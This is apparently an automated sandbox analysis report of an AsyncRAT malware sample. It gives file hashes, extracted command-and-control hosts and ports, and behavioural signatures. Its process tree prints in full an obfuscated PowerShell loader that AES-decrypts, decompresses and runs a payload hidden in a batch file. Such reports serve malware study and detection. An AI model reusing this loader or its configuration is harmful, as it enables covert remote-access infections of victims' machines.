Analysis
-
max time kernel
36s -
max time network
35s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
01-02-2023 20:06
Behavioral task
behavioral1
Sample
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
Resource
win7-20221111-en
General
-
Target
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
-
Size
72KB
-
MD5
8cb1d168cf75e754026203935dcfa023
-
SHA1
ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb
-
SHA256
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126
-
SHA512
7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae
-
SSDEEP
1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x
Malware Config
Extracted
asyncrat
0.5.7B
Default
churchmon.ddns.net:6606
churchmon.ddns.net:7707
churchmon.ddns.net:8808
churchmon21.ddns.net:6606
churchmon21.ddns.net:7707
churchmon21.ddns.net:8808
churchmon22.ddns.net:6606
churchmon22.ddns.net:7707
churchmon22.ddns.net:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1184-54-0x00000000010B0000-0x00000000010C2000-memory.dmp asyncrat behavioral1/memory/1184-56-0x0000000000590000-0x00000000005B2000-memory.dmp asyncrat -
Executes dropped EXE 1 IoCs
Processes:
gefcmy.bat.exepid process 736 gefcmy.bat.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 532 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1100 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 808 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exegefcmy.bat.exepid process 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 736 gefcmy.bat.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exepowershell.exegefcmy.bat.exedescription pid process Token: SeDebugPrivilege 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 736 gefcmy.bat.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.execmd.execmd.exepowershell.execmd.exedescription pid process target process PID 1184 wrote to memory of 916 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 916 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 916 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 916 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 532 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 532 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 532 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 1184 wrote to memory of 532 1184 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 916 wrote to memory of 1456 916 cmd.exe powershell.exe PID 916 wrote to memory of 1456 916 cmd.exe powershell.exe PID 916 wrote to memory of 1456 916 cmd.exe powershell.exe PID 916 wrote to memory of 1456 916 cmd.exe powershell.exe PID 532 wrote to memory of 808 532 cmd.exe timeout.exe PID 532 wrote to memory of 808 532 cmd.exe timeout.exe PID 532 wrote to memory of 808 532 cmd.exe timeout.exe PID 532 wrote to memory of 808 532 cmd.exe timeout.exe PID 1456 wrote to memory of 1100 1456 powershell.exe cmd.exe PID 1456 wrote to memory of 1100 1456 powershell.exe cmd.exe PID 1456 wrote to memory of 1100 1456 powershell.exe cmd.exe PID 1456 wrote to memory of 1100 1456 powershell.exe cmd.exe PID 1100 wrote to memory of 736 1100 cmd.exe gefcmy.bat.exe PID 1100 wrote to memory of 736 1100 cmd.exe gefcmy.bat.exe PID 1100 wrote to memory of 736 1100 cmd.exe gefcmy.bat.exe PID 1100 wrote to memory of 736 1100 cmd.exe gefcmy.bat.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\gefcmy.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe"gefcmy.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\gefcmy.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat""2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\gefcmy.batFilesize
325KB
MD536438d908fc48e243fc04035eba3a6cd
SHA1a552a88e74440a1137b3a3a14e4089a630dfb855
SHA25680504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a
SHA5123cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611
-
C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.batFilesize
216B
MD5b114271fc8c4f0f20cc0cf6b5315bec7
SHA1e83d81844f32e140a7de1f455fb3464551bfb27e
SHA2567db48b1affca55499bcdecfc3597346246c7b1f04aa8e0b8ea23e2de541bf892
SHA5129a3ab883bfd4be07c3bb19e89cbedd90ec7fe1820e7ded15d918397182ed18f9ee9c24a657f77bebe8f34d696a59391fe83c6d892f5e9e44a18d8bc5e0bcf8d9
-
\Users\Admin\AppData\Local\Temp\gefcmy.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
memory/532-58-0x0000000000000000-mapping.dmp
-
memory/736-68-0x0000000000000000-mapping.dmp
-
memory/736-71-0x0000000074400000-0x00000000749AB000-memory.dmpFilesize
5.7MB
-
memory/736-72-0x0000000074400000-0x00000000749AB000-memory.dmpFilesize
5.7MB
-
memory/808-61-0x0000000000000000-mapping.dmp
-
memory/916-57-0x0000000000000000-mapping.dmp
-
memory/1100-65-0x0000000000000000-mapping.dmp
-
memory/1184-54-0x00000000010B0000-0x00000000010C2000-memory.dmpFilesize
72KB
-
memory/1184-56-0x0000000000590000-0x00000000005B2000-memory.dmpFilesize
136KB
-
memory/1184-55-0x0000000075BE1000-0x0000000075BE3000-memory.dmpFilesize
8KB
-
memory/1456-59-0x0000000000000000-mapping.dmp
-
memory/1456-63-0x0000000073F30000-0x00000000744DB000-memory.dmpFilesize
5.7MB
-
memory/1456-66-0x0000000073F30000-0x00000000744DB000-memory.dmpFilesize
5.7MB